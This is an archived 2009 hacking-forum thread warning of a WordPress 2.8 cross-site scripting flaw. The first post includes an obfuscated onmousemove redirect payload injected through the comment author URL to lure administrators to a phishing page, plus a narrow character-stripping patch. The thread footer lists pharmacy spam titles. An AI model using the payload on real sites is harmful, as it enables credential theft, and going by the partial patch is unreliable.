GoogleBig » Forum / Hacking - Programming - Cheats / CROSS-SITE SCRIPTING / Be Careful,Wordpress 2.8 All Version Xss 0DAY

Make a donation for a new forum platform. Thanks!

Googlebig is for sale! If you want to buy contact us

Search | Member List | Calendar | Help | Downloads <-- Only firefox compatible
Current time: 17-05-2012, 06:54 PM | Shoutbox Hello There, Guest! (LoginRegister)


Post Reply  Post Thread 
Be Careful,Wordpress 2.8 All Version Xss 0DAY
Author Message
wwwsina
GB - Newbie
*


Posts: 6
Group: Registered
Joined: Jun 2009
Status: Offline
Reputation: 0
Post: #1
Be Careful,Wordpress 2.8 All Version Xss 0DAY

Be Careful,Wordpress 2.8 All Version Xss 0DAY

From http://www.vul.kr/?p=569

It had been published that wordpress 2.8 All version are suffering from Xss,attackers can use this to do fishing,they make a wordpress login page as it is your own.If you don’t take care,your password will be sent to the attacker’s website.With your password,they can edit pages and upload webshell.It is harmful.

How is the attacker do this?
they insert website url like this:
http://www.vul.kr’

Code:
onmousemove=’location.href=String.fromCharCode(104,116,116,112,58,47,47,119,119,
119,46,118,117,108,46,107,114,47,63,112,61,53,54,57);


If the someone(or administrator) moved his mouse on the author’s website.It will jump to another URL,which is a fishing page.

How can we patch it?
Edit wp-comments-post.php
go line 40 and then add:

Code:
$comment_author_url = str_replace(chr(39),”,$comment_author_url);
$comment_author_url = str_replace(chr(59),”,$comment_author_url);
$comment_author_url = str_replace(chr(44),”,$comment_author_url);

Webmasters,please patch it as soon as you can.

This post was last modified: 19-07-2009 01:47 AM by Langy.

Firefox Windows XP/2003
Browser e O.S.: 
17-07-2009 05:54 PM
Find all posts by this user Quote this message in a reply
Langy
Administrator
*******


Posts: 8.464
Group: Administrators
Joined: Sep 2007
Status: Offline
Reputation: 10
Post: #2
RE: Be Careful,Wordpress 2.8 All Version Xss 0DAY

nice post man

PS. I have added code tag in your post. Remember it in next post. ty

"There is no patch for human stupidity" - K. D. M.

This post was last modified: 19-07-2009 01:48 AM by Langy.

Firefox Windows XP/2003
Browser e O.S.: 
19-07-2009 01:45 AM
Visit this user's website Find all posts by this user Quote this message in a reply
Post Reply  Post Thread 

Possibly Related Threads...
Thread: Author Replies: Views: Last Post
  buy cheap Bupropion buy adelaide - discount generic Bupropion 150 mg generic version werlee 0 4 06-01-2012 05:09 AM
Last Post: werlee
  cheap Avodart canada internet - generic version Avodart 0.5 mg kansas city raylee 0 3 04-01-2012 01:02 PM
Last Post: raylee
  purchase Tolterodine canada fast shipping - generic version Tolterodine 4 mg direct raylee 0 3 04-01-2012 01:13 AM
Last Post: raylee
  how to buy Ponstel buy online australia - cheapest Ponstel 500 mg generic version werlee 0 3 03-01-2012 02:56 PM
Last Post: werlee
  order Coumadin generic in usa - buy generic Coumadin 5 mg generic version raylee 0 3 02-01-2012 09:58 AM
Last Post: raylee
  order Clindamycin usa mastercard - generic version Clindamycin 300 mg no prescription in australia raylee 0 4 01-01-2012 04:49 PM
Last Post: raylee
  order Fluvoxamine generic drug india - Canada order Fluvoxamine 100 mg generic version raylee 0 5 01-01-2012 06:03 AM
Last Post: raylee
  purchase Periactin price south africa - generic version Periactin 4 mg online new zealand werlee 0 3 31-12-2011 10:49 AM
Last Post: werlee
  buy Pulmicort price by pharmacy - generic version Pulmicort 100 mcg/inh cheap price werlee 0 2 30-12-2011 11:13 PM
Last Post: werlee
  buy Styplon canada generic - generic version Styplon 30 tabs with no prescription needed raylee 0 6 30-12-2011 06:36 AM
Last Post: raylee

View a Printable Version
Send this Thread to a Friend
Subscribe to this Thread | Add Thread to Favorites

Home Page | Contact Us | Lite (Archive) Mode | RSS